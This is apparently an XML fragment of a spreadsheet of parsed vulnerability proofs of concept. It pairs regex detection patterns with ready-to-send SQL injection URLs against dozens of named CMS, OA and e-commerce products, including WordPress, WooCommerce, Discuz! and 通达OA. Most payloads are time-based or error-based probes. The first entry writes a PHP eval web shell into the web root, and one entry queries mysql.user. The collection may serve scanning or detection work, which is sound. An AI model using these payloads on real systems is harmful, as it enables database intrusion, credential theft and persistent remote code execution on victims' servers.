    <t>/index.php?s=/Index/dologin/name/demo%27)%3bselect%20unhex%28%273c3f70687020406576616c28245f504f53545b315d293b3f3e%27%29%20into%20outfile%20%27%2e%5C%5C%2e%2e%5C%5C%2e%2e%5C%5CWebRoot%5C%5C{{file_name}}%27%23/pwd/123123</t>
  </si>
  <si>
    <t>海洋CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=@`%27`,%20extractvalue\(1,%20concat_ws\(0x20,%200x5c,\(select%20md5\(\{\{num\}\}\)\)\)\),@`%27`|/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=@`%27`,%20extractvalue\(1,%20concat_ws\(0x20,%200x5c,\(select%20md5\(202072102\)\)\)\),@`%27`).*</t>
  </si>
  <si>
    <t>/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`|/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`</t>
  </si>
  <si>
    <t>站点地图</t>
  </si>
  <si>
    <t>站点地图_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/sitemap\.xml\?offset=1%3bSELECT%20IF\(\(8303%3E8302\)%2cSLEEP\(10\)%2c2356\)%23).*</t>
  </si>
  <si>
    <t>/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23</t>
  </si>
  <si>
    <t>通达OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/inc/finger/use_finger\.php\?USER_ID=\-123%df'and\ extractvalue\(1,\ concat\(0x5c,\(database\(\)\)\)\)%23).*</t>
  </si>
  <si>
    <t>/inc/finger/use_finger.php?USER_ID=-123%df'and extractvalue(1, concat(0x5c,(database())))%23</t>
  </si>
  <si>
    <t>TPShop_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/mobile/index/index2/id/1\)\ and\ \(select\ 1\ from\ \(select\ count\(\*\),concat\(0x7e,\(select\ \{\{verify\}\}\),0x7e,floor\(rand\(0\)\*2\)\)x\ from\ information_schema\.tables\ group\ by\ x\)a\)\-\-).*</t>
  </si>
  <si>
    <t>/mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x7e,(select {{verify}}),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)--</t>
  </si>
  <si>
    <t>用友_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/portal/pt/cartabletimeline/doList\?pageId=login\&amp;mtr=1\)WAITFOR\+DELAY\+%270:0:0%27\-\-\+|/portal/pt/cartabletimeline/doList\?pageId=login\&amp;mtr=1\)WAITFOR\+DELAY\+%270:0:5%27\-\-\+).*</t>
  </si>
  <si>
    <t>/portal/pt/cartabletimeline/doList?pageId=login&amp;mtr=1)WAITFOR+DELAY+%270:0:0%27--+|/portal/pt/cartabletimeline/doList?pageId=login&amp;mtr=1)WAITFOR+DELAY+%270:0:5%27--+</t>
  </si>
  <si>
    <t>万户_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit\.jsp;\?RecordID=1'%20UNION%20ALL%20SELECT%20sys\.fn_sqlvarbasetostr\(HashBytes\(%27MD5%27,%27qaxnb%27\)\)%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27qaxnb%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--</t>
  </si>
  <si>
    <t>微擎_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/public/index\.php/home/index/bind_follow/\?publicid=1\&amp;is_ajax=1\&amp;uid\[0\]=exp\&amp;uid\[1\]=\)%20and%20updatexml\(1,concat\(0x7e,md5\('999999'\),0x7e\),1\)\-\-\+).*</t>
  </si>
  <si>
    <t>WooCommerce_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/\?rest_route=/wc/store/products/collection\-data\&amp;calculate_attribute_counts\[0\]\[query_type\]=or\&amp;calculate_attribute_counts\[0\]\[taxonomy\]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli\-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500|/wp\-json/wc/store/products/collection\-data\?calculate_attribute_counts\[0\]\[query_type\]=or\&amp;calculate_attribute_counts\[0\]\[taxonomy\]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli\-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500).*</t>
  </si>
  <si>
    <t>/?rest_route=/wc/store/products/collection-data&amp;calculate_attribute_counts[0][query_type]=or&amp;calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500|/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&amp;calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500</t>
  </si>
  <si>
    <t>WordPress_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=sl_dal_searchlocation\&amp;funMethod=SearchStore\&amp;Location=Social\&amp;StoreLocation=1\~1\+UNION\+SELECT\+1,2,3,4,md5\(123123123\),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39\-\-).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&amp;funMethod=SearchStore&amp;Location=Social&amp;StoreLocation=1~1+UNION+SELECT+1,2,3,4,md5(123123123),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--</t>
  </si>
  <si>
    <t>cnvd_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\.php\?page=itsec\-logs\&amp;filter=malware\&amp;orderby=remote_ip%2c\(select\*from\(select\(sleep\(5\)\)\)a\)\&amp;order=asc\&amp;paged=0).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=itsec-logs&amp;filter=malware&amp;orderby=remote_ip%2c(select*from(select(sleep(5)))a)&amp;order=asc&amp;paged=0</t>
  </si>
  <si>
    <t>五指CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/api/sms_check\.php\?param=1%27%20and%20updatexml\(1,concat\(0x7e,\(SELECT%20MD5\(1234\)\),0x7e\),1\)\-\-%20|/api/sms_check\.php\?param=1%27%20and%20updatexml\(1,concat\(0x7e,\(SELECT%20MD5\(\{\{num\}\}\)\),0x7e\),1\)\-\-%20).*</t>
  </si>
  <si>
    <t>/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20|/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20md5\(\{\{randstr\}\}\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5({{randstr}}))</t>
  </si>
  <si>
    <t>.*?(?:/servlet/com\.sksoft\.bill\.QueryService\?service=query\&amp;content=SELECT%20HashBytes\('md5','\{\{str\}\}'\);).*</t>
  </si>
  <si>
    <t>/servlet/com.sksoft.bill.QueryService?service=query&amp;content=SELECT%20HashBytes('md5','{{str}}');</t>
  </si>
  <si>
    <t>.*?(?:/ecp/productonsale/querygoodsgridbycode\.json\?code=1%27%29\+AND\+9976%3DUTL_INADDR\.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT\+%28CASE\+WHEN\+%289976%3D9976%29\+THEN\+1\+ELSE\+0\+END%29\+FROM\+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29\-\-\+dpxi).*</t>
  </si>
  <si>
    <t>/ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi</t>
  </si>
  <si>
    <t>ZCMS</t>
  </si>
  <si>
    <t>ZCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/admin/cms_channel\.php\?del=123456\+AND\+\(SELECT\+1\+FROM\(SELECT\+COUNT\(\*\)%2cCONCAT\(0x7e%2cmd5\(202072102\)%2c0x7e%2cFLOOR\(RAND\(0\)\*2\)\)x\+FROM\+INFORMATION_SCHEMA\.CHARACTER_SETS\+GROUP\+BY\+x\)a\)\-\-%2b'|/admin/cms_channel\.php\?del=123456\+AND\+\(SELECT\+1\+FROM\(SELECT\+COUNT\(\*\)%2cCONCAT\(0x7e%2cmd5\(\{\{num\}\}\)%2c0x7e%2cFLOOR\(RAND\(0\)\*2\)\)x\+FROM\+INFORMATION_SCHEMA\.CHARACTER_SETS\+GROUP\+BY\+x\)a\)\-\-%2b').*</t>
  </si>
  <si>
    <t>/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'|/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'</t>
  </si>
  <si>
    <t>致翔_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/mainpage/msg\.aspx\?user=1'\+and\+\(SELECT\+sys\.fn_sqlvarbasetostr\(HashBytes\('MD5',\+'\{\{randstr\}\}'\)\)\)%3d1\+\-\-).*</t>
  </si>
  <si>
    <t>/mainpage/msg.aspx?user=1'+and+(SELECT+sys.fn_sqlvarbasetostr(HashBytes('MD5',+'{{randstr}}')))%3d1+--</t>
  </si>
  <si>
    <t>.*?(?:/mainpage/msglog\.aspx\?user=1'\+and\+\(SELECT\+sys\.fn_sqlvarbasetostr\(HashBytes\('MD5',\+'\{\{randstr\}\}'\)\)\)%3d1\+\-\-).*</t>
  </si>
  <si>
    <t>/mainpage/msglog.aspx?user=1'+and+(SELECT+sys.fn_sqlvarbasetostr(HashBytes('MD5',+'{{randstr}}')))%3d1+--</t>
  </si>
  <si>
    <t>致远OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(17\)%20union%20select%201,2,md5\(123\),1%23).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20select%201,2,md5(123),1%23</t>
  </si>
  <si>
    <t>74CMS</t>
  </si>
  <si>
    <t>74CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/plus/ajax_officebuilding\.php\?act=key\&amp;key=錦%27%20a&lt;&gt;nd%201=2%20un&lt;&gt;ion%20sel&lt;&gt;ect%201,2,3,md5\(randomInt\(200000000,\ 210000000\)\),5,6,7,8,9%23).*</t>
  </si>
  <si>
    <t>/plus/ajax_officebuilding.php?act=key&amp;key=錦%27%20a&lt;&gt;nd%201=2%20un&lt;&gt;ion%20sel&lt;&gt;ect%201,2,3,md5(randomInt(200000000, 210000000)),5,6,7,8,9%23</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?m=\&amp;c=AjaxPersonal\&amp;a=company_focus\&amp;company_id\[0\]=match\&amp;company_id\[1\]\[0\]=aaaaaaa"\)\ and\ extractvalue\(1,concat\(0x7e,md5\(99999999\)\)\)\ \-\-\ a).*</t>
  </si>
  <si>
    <t>/index.php?m=&amp;c=AjaxPersonal&amp;a=company_focus&amp;company_id[0]=match&amp;company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a</t>
  </si>
  <si>
    <t xml:space="preserve">高级房地产脚本 城市模块 </t>
  </si>
  <si>
    <t>高级房地产脚本 城市模块_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/city\.php\?city=\[\-1%27\+/\*!50000union\*/\+select\+1,2,3,4,5,md5\(233\),7,8,9\-\-%20\-\]|/locat\.php\?locat=\[\-1%27\+/\*!50000union\*/\+select\+1,2,3,4,5,6,md5\(233\),8\-\-%20\-\]).*</t>
  </si>
  <si>
    <t>/city.php?city=[-1%27+/*!50000union*/+select+1,2,3,4,5,md5(233),7,8,9--%20-]|/locat.php?locat=[-1%27+/*!50000union*/+select+1,2,3,4,5,6,md5(233),8--%20-]</t>
  </si>
  <si>
    <t>.*?(?:/state\.php\?country=\[\-1%27\+/\*!50000union\*/\+select\+1,2,3,4,md5\(233\),6\-\-%20\-\]).*</t>
  </si>
  <si>
    <t>/state.php?country=[-1%27+/*!50000union*/+select+1,2,3,4,md5(233),6--%20-]</t>
  </si>
  <si>
    <t>.*?(?:/author_posts\.php\?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT\(md5\(\{\{num\}\}\),1,1\),NULL,NULL,NULL,NULL\-\-%20\-\&amp;p_id=1|/cms/author_posts\.php\?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT\(md5\(\{\{num\}\}\),1,1\),NULL,NULL,NULL,NULL\-\-%20\-\&amp;p_id=1).*</t>
  </si>
  <si>
    <t>AikCMS</t>
  </si>
  <si>
    <t>AikCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/admin/page/system/link_edit\.php\?id=1%20and%20if\(1,sleep\(3\),1\)).*</t>
  </si>
  <si>
    <t>/admin/page/system/link_edit.php?id=1%20and%20if(1,sleep(3),1)</t>
  </si>
  <si>
    <t>.*?(?:/admin/page/user/notice_edit\.php\?id=1%20and%20if\(1,sleep\(3\),1\)).*</t>
  </si>
  <si>
    <t>/admin/page/user/notice_edit.php?id=1%20and%20if(1,sleep(3),1)</t>
  </si>
  <si>
    <t>.*?(?:/admin/page/system/poster_edit\.php\?id=1%20and%20if\(1,sleep\(3\),1\)).*</t>
  </si>
  <si>
    <t>/admin/page/system/poster_edit.php?id=1%20and%20if(1,sleep(3),1)</t>
  </si>
  <si>
    <t>.*?(?:/aikcms2\.0/admin/page/video/videogroup_edit\.php\?id=3%20and%20if\(1,sleep\(3\),1\)%23</t>
  </si>
  <si>
    <t>/aikcms2.0/admin/page/video/videogroup_edit.php?id=3%20and%20if(1,sleep(3),1)%23|/admin/page/video/videogroup_edit.php</t>
  </si>
  <si>
    <t xml:space="preserve">Axublog Hit </t>
  </si>
  <si>
    <t>Axublog Hit_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/hit\.php\?g=arthit\&amp;id=\-1%20\+%55NION\+ALL\+%53ELECT\+1,2,3,4,5,6,md5\(1\),8,9,10,11,12%20from%20axublog_adusers).*</t>
  </si>
  <si>
    <t>/hit.php?g=arthit&amp;id=-1%20+%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12%20from%20axublog_adusers</t>
  </si>
  <si>
    <t>Axublog Search</t>
  </si>
  <si>
    <t>Axublog Search_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/search\.php\?word=123%%27%20union%20select%201,2,3,4,5,6,7,8,md5\(1\),10,11,12;%23).*</t>
  </si>
  <si>
    <t>/search.php?word=123%%27%20union%20select%201,2,3,4,5,6,7,8,md5(1),10,11,12;%23</t>
  </si>
  <si>
    <t>search_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>BartarCMS</t>
  </si>
  <si>
    <t>BartarCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pages/allgallary\.php\?idcatall=2\&amp;idcat=\-2171%27%20UNION%20ALL%20SELECT%20CONCAT\(0x7176707071,md5\(123\),0x7178767671\)\-\-%20UgIm).*</t>
  </si>
  <si>
    <t>/pages/allgallary.php?idcatall=2&amp;idcat=-2171%27%20UNION%20ALL%20SELECT%20CONCAT(0x7176707071,md5(123),0x7178767671)--%20UgIm</t>
  </si>
  <si>
    <t>BlueCMS</t>
  </si>
  <si>
    <t>BlueCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/ad_js\.php\?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5\(3\.1415\),md5\(3\.1415\)).*</t>
  </si>
  <si>
    <t>/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)</t>
  </si>
  <si>
    <t>Bookinge酒店预订管理系统info模块</t>
  </si>
  <si>
    <t>Bookinge酒店预订管理系统info模块_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/\?m=info\.detail\&amp;id=1%20AND%20\(SELECT%201%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x7e,\(MID\(\(IFNULL\(CAST\(md5\(1\)%20AS%20CHAR\),0x20\)\),1,50\)\),0x7e,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/?m=info.detail&amp;id=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>PbootCMS</t>
  </si>
  <si>
    <t>PbootCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/homepage/search/\?q=1%%27\)\+and\(select%201%20from\(select%20count\(\*\),concat\(\(select%20\(select%20\(select%20concat\(0x7e,md5\(520\),0x7e\)\)\)%20from%20information_schema\.tables%20limit%200,1\),floor\(rand\(0\)\*2\)\)x%20from%20information_schema\.tables%20group%20by%20x\)a\)%23\&amp;x=0\&amp;y=0).*</t>
  </si>
  <si>
    <t>/homepage/search/?q=1%%27)+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(520),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&amp;x=0&amp;y=0</t>
  </si>
  <si>
    <t>.*?(?:/tplus/UFAQD/KeyInfoList\.aspx\?preload=1\&amp;zt='\)AND\+1\+IN\+\(SELECT\+sys\.fn_varbintohexstr\(hashbytes\('MD5'%2C'999999999'\)\)\)\-\-\+).*</t>
  </si>
  <si>
    <t>/tplus/UFAQD/KeyInfoList.aspx?preload=1&amp;zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5'%2C'999999999')))--+</t>
  </si>
  <si>
    <t>CMSEasy</t>
  </si>
  <si>
    <t>CMSEasy_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?case=archive\&amp;act=orders\&amp;aid\[typeid%60%3d1%20UNION%20SELECT/\*\*/1,2,3,concat%28md5%281%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23\]=1).*</t>
  </si>
  <si>
    <t>/index.php?case=archive&amp;act=orders&amp;aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat%28md5%281%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=1</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?case=archive\&amp;act=orders\&amp;aid\[typeid%60%3d1%20UNION%20SELECT/\*\*/1,2,3,concat\(md5\(123\),md5\(123\)\),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23\]=1).*</t>
  </si>
  <si>
    <t>/index.php?case=archive&amp;act=orders&amp;aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(md5(123),md5(123)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=1</t>
  </si>
  <si>
    <t>.*?(?:/portal/attachment_clearTempFile\.action\?bean\.RecId=1'\)\ AND\ EXTRACTVALUE\(534543,CONCAT\(0x5c,md5\(\{\{num\}\}\),0x5c\)\)\ AND\ \('n72Yk'='n72Yk\&amp;bean\.TabName=1|/portal/attachment_getAttList\.action\?bean\.RecId=1'\)\ AND\ EXTRACTVALUE\(534543,CONCAT\(0x5c,md5\(\{\{num\}\}\),0x5c\)\)\ AND\ \('n72Yk'='n72Yk\&amp;bean\.TabName=1).*</t>
  </si>
  <si>
    <t>.*?(?:/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml\(1,concat\(0x7e,\(select%20md5\(123\)\),0x7e\),1\)\-\-%22%7D/extend/%7B%7D).*</t>
  </si>
  <si>
    <t>/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D</t>
  </si>
  <si>
    <t>.*?(?:/member/ajax_membergroup\.php\?action=post\&amp;membergroup=@`'`/\*!50000Union\+\*/\+/\*!50000select\+\*/\+md5\(\{\{num\}\}\)\+\-\-\+@`'`).*</t>
  </si>
  <si>
    <t>.*?(?:/member/ajax_membergroup\.php\?action=post\&amp;membergroup=@`'`/\*!50000Union\+\*/\+/\*!50000select\+\*/\+md5\(randomInt\(800000000,\ 1000000000\)\)\+\-\-\+@`'`).*</t>
  </si>
  <si>
    <t>/member/ajax_membergroup.php?action=post&amp;membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(randomInt(800000000, 1000000000))+--+@`'`</t>
  </si>
  <si>
    <t>.*?(?:/plus/guestbook\.php\?action=admin\&amp;job=editok\&amp;id=\{\{articleid\}\}\&amp;msg=',msg=@`'`,msg=\(selecT\ md5\(\{\{r\}\}\)\),email='</t>
  </si>
  <si>
    <t>/plus/guestbook.php?action=admin&amp;job=editok&amp;id={{articleid}}&amp;msg=',msg=@`'`,msg=(selecT md5({{r}})),email='|/plus/guestbook.php</t>
  </si>
  <si>
    <t>.*?(?:/plus/count\.php\?view=yes\&amp;aid=1\+and\+updatexml\(1,\(hex\(md5\(123\)\)\),1\)\+and\+1=1\-\-\+\-).*</t>
  </si>
  <si>
    <t>/plus/count.php?view=yes&amp;aid=1+and+updatexml(1,(hex(md5(123))),1)+and+1=1--+-</t>
  </si>
  <si>
    <t>Discuz!</t>
  </si>
  <si>
    <t>Discuz!_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/plugin\.php\?id=v63shop:goods\&amp;pac=info\&amp;gid=`'`\ or\ @`''`\ union\ select\ 1\ from\ \(select\ count\(\*\),concat\(\(select\ md5\(3\.14\)\),floor\(rand\(0\)\*2\)\)a\ from\ information_schema\.tables\ group\ by\ a\)b\ where\ @`'`|/plugin\.php\?id=v63shop:goods\&amp;pac=info\&amp;gid=1\ and\ 1=2\ union\ /\*!50000select\*/\ 1,2,3,4,5,6,md5\(3\.14\),8,9,10,11,12,13,14).*</t>
  </si>
  <si>
    <t>/plugin.php?id=v63shop:goods&amp;pac=info&amp;gid=`'` or @`''` union select 1 from (select count(*),concat((select md5(3.14)),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`|/plugin.php?id=v63shop:goods&amp;pac=info&amp;gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,md5(3.14),8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t>.*?(?:/upload/my\.php\?item=buddylist\&amp;descriptionnew\[%27%20and\(select%201%20from\(select%20count\(\*\),concat\(\(select\(select%20concat\(0x7c,md5\(1\),0x7c,md5\(1\),0x7c\)%20from%20cdb_members%20limit%200,1\)%20from%20information_schema\.tables%20limit%200,1\),floor\(rand\(0\)\*2\)\)x%20from%20information_schema\.tables%20group%20by%20x\)a\)%23\]=1).*</t>
  </si>
  <si>
    <t>/upload/my.php?item=buddylist&amp;descriptionnew[%27%20and(select%201%20from(select%20count(*),concat((select(select%20concat(0x7c,md5(1),0x7c,md5(1),0x7c)%20from%20cdb_members%20limit%200,1)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23]=1</t>
  </si>
  <si>
    <t>.*?(?:/plugin\.php\?id=nds_up_ques:nds_ques_viewanswer\&amp;srchtxt=1\&amp;orderby=dateline%20and%201=\(updatexml\(1,concat\(0x27,MD5\(1\)\),1\)\)\-\-).*</t>
  </si>
  <si>
    <t>/plugin.php?id=nds_up_ques:nds_ques_viewanswer&amp;srchtxt=1&amp;orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--</t>
  </si>
  <si>
    <t>.*?(?:/faq\.php\?action=grouppermission\&amp;gids\[99\]=%27\&amp;gids\[100\]\[0\]=\)%20and%20\(select%201%20from%20\(select%20count\(\*\),concat\(\(select%20concat\(user,0x3a,md5\(1234\),0x3a\)%20from%20mysql\.user%20limit%200,1\),floor\(rand\(0\)\*2\)\)x%20from%20information_schema\.tables%20group%20by%20x\)a\)%23).*</t>
  </si>
  <si>
    <t>/faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23</t>
  </si>
  <si>
    <t>.*?(?:/shop\.php\?ac=view\&amp;shopid=1\ and\(select\ 1\ from\(select\ count\(\*\),concat\(\(select\ \(select\ concat\(0x7e,0x27,unhex\(hex\(md5\(3\.1415\)\)\),0x27,0x7e\)\)\ from\ information_schema\.tables\ limit\ 0,1\),floor\(rand\(0\)\*2\)\)x\ from\ information_schema\.tables\ group\ by\ x\)a\)\ and\ 1=1).*</t>
  </si>
  <si>
    <t>/shop.php?ac=view&amp;shopid=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(md5(3.1415))),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</t>
  </si>
  <si>
    <t>.*?(?:/misc\.php\?mod=stat\&amp;op=trend\&amp;xml=1\&amp;merge=1\&amp;types\[1\]=password`as%20statistic%20\(select%20\(select%20md5\(12345\)%20from%20pre_common_statuser,pre_ucenter_members%20as).*</t>
  </si>
  <si>
    <t>/misc.php?mod=stat&amp;op=trend&amp;xml=1&amp;merge=1&amp;types[1]=password`as%20statistic%20(select%20(select%20md5(12345)%20from%20pre_common_statuser,pre_ucenter_members%20as</t>
  </si>
  <si>
    <t>.*?(?:/batch\.common\.php\?action=modelquote\&amp;cid=1\&amp;name=spacecomments,\(SELECT%203284%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(CHAR\(58,105,99,104,58\),\(MID\(\(IFNULL\(CAST\(md5\(1\)%20AS%20CHAR\),CHAR\(32\)\)\),1,50\)\),CHAR\(58,107,111,117,58\),FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20information_schema\.tables%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/batch.common.php?action=modelquote&amp;cid=1&amp;name=spacecomments,(SELECT%203284%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,105,99,104,58),(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,107,111,117,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)</t>
  </si>
